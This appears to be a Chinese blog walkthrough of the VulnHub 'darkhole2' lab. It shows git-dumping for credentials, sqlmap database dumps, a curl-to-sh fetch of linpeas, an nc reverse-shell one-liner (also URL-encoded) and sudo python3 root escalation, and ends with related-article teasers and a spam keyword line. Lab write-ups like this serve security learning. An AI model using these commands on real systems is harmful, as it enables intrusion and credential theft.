<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之darkhole2的實踐

    VSole2022-07-10 15:32:30

    今天實踐的是vulnhub的darkhole2鏡像,

    下載地址,https://download.vulnhub.com/darkhole/darkhole_2.zip,

    用workstation導入成功,地址掃描得到有效地址,

    sudo netdiscover -r 192.168.58.0/24,

    繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.138,

    瀏覽器訪問找到登錄入口,

    瀏覽器訪問端口掃描到的git路徑,192.168.58.138:80/.git/,

    用gitdumper對git目錄進行信息收集,

    git clone https://github.com/arthaud/git-dumper.git,

    cd git-dumper,mkdir backup,

    python3 git_dumper.py http://192.168.58.138/.git/ backup,

    cd backup,git log,

    git diff a4d900a8d85e8938d3601f3cef113ee293028e10,

    獲取到賬號密碼,lush@admin.com/321,

    登錄之前找到的入口,猜測是sql注入點,

    用burpsuite截取cookie信息,

    把請求保存到本地sql文件,

    用sqlmap進行爆破,sqlmap -r sql --dbs --batch,獲取到數據庫,

    繼續對darkhole_2數據庫爆破,

    sqlmap -r sql -D darkhole_2 --dump-all --batch,

    獲取到賬號密碼,jehad/fool,

    ssh登錄,ssh jehad@192.168.58.138,不是root,需要繼續提權,

    下載linpeas.sh查找提權信息,cd /tmp,

    curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh,

    獲取到losy用戶在本地9999端口開了php服務,

    查看php服務文件發現提供了命令執行能力,

    外面無法直接訪問,就通過ssh做一個通道,

    ssh jehad@192.168.58.138 -L 9999:localhost:9999,

    做一個反彈shell的命令,用burpsuite編碼,

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.58.131 8888 >/tmp/f,

    在kali攻擊機上開一個nc監聽,nc -lvp 8888,

    帶著反彈shell命令訪問php服務,

    http://127.0.0.1:9999/?cmd=%72%6d%20%2f%74%6d%70%2f%66%3b%6d%6b%66%69%66%6f%20%2f%74%6d%70%2f%66%3b%63%61%74%20%2f%74%6d%70%2f%66%7c%2f%62%69%6e%2f%73%68%20%2d%69%20%32%3e%26%31%7c%6e%63%20%31%39%32%2e%31%36%38%2e%35%38%2e%31%33%31%20%38%38%38%38%20%3e%2f%74%6d%70%2f%66,

    反彈shell就過來了,

    轉成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',

    查看losy用戶home目錄,cd /home/losy,

    cat .bash_history,獲取到賬號密碼,losy/gang,

    sudo -l發現python3就有root權限,重新獲取shell,

    sudo python3 -c 'import pty; pty.spawn("/bin/bash")',確認是root,

    shellpython3
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    vulnhub之Chili的實踐
    2023-01-03 09:12:49
    vulnhub之Chili的實踐
    vulnhub之Bellatrix的實踐
    2022-07-30 13:33:28
    今天實踐的是vulnhub的Bellatrix鏡像,下載地址,https://download.vulnhu
    vulnhub之darkhole2的實踐
    2022-07-10 15:32:30
    今天實踐的是vulnhub的darkhole2鏡像,下載地址,https://download.vulnhu
    vulnhub之ha-natraj的實踐
    2023-05-29 15:40:49
    今天實踐的是vulnhub的ha-natraj鏡像,下載地址,https://download.vulnhu
    實戰打靶之Obscurity
    2022-11-24 13:50:00
    訪問其8080端口,發現是一個web界面。瀏覽頁面內容,提升有一些提示。發現提示是4042.目錄爆破使用gobuster進行目錄爆破。gobuster dir-u http://10.10.10.168:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt ,發現都是404.3.使用wfuzz進行fuzz由于我們不知道文件存放在那個具體路徑下,所以將使用wfuzzurl 來定位http://10.10.10.168:8080/FUZZ/SuperSecureServer.py其路徑。wfuzz -c-w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py --hl 6 --hw 367發現它在/developer目錄之下。成功看到腳本內容。"400": "BAD REQUEST", "401": "UNAUTHORIZED", "403": "FORBIDDEN", "404": "NOT FOUND",
    情景一 默認SSH密碼批量反彈shell 情景二 dump源碼 情景三 利用shell批量getflag 情景四 批量利用一句話木馬種植不死馬 最近工作很忙 今天抽空準備下AWD比賽得攻防工具和腳本 以下只是常用 希望下周不被吊錘~~ 后續整理后想抽空寫成一個攻擊框架匯總放github~~ 這里從各種情景和需求中去總結工具和腳本的使用
    Struts2漏洞利用掃描工具,基于互聯網上已經公開的Structs2高危漏洞exp的掃描利用工具,目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-
    實戰打靶系列第?靶機的ip:192.168.56.105kali的ip:192.168.56.103
    靶機Agile補充圖片
    2023-03-22 10:04:15
    Nmap done: 1 IP address scanned in 171.68 seconds. 添加host└─# echo "10.10.11.203 superpass.htb" >> /etc/hosts. 注冊個賬號就讀取了。我們可以在 python 中創建一個腳本,自動實現這個過程,只需要輸入的文件路徑└─# cat lfi.py. data = {"username": "123", "password": "123", "submit": ""}
    Redis系列漏洞總結
    2023-06-19 10:29:18
    前言Redis的未授權漏洞一直都是一個很火的漏洞,最近看許多前輩的文章自己復現后,根據自己的實踐再次總結一下,為日后復習方便回顧。Redis簡介redis是一個key-value存儲系統。和Memcached類似,它支持存儲的value類型相對更多,包括string、list、set、zset和hash。這些數據類型都支持push/pop、add/remove及取交集并集和差集及更豐富的操作,而且這些操作都是原子性的。在此基礎上,redis支持各種不同方式的排序。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类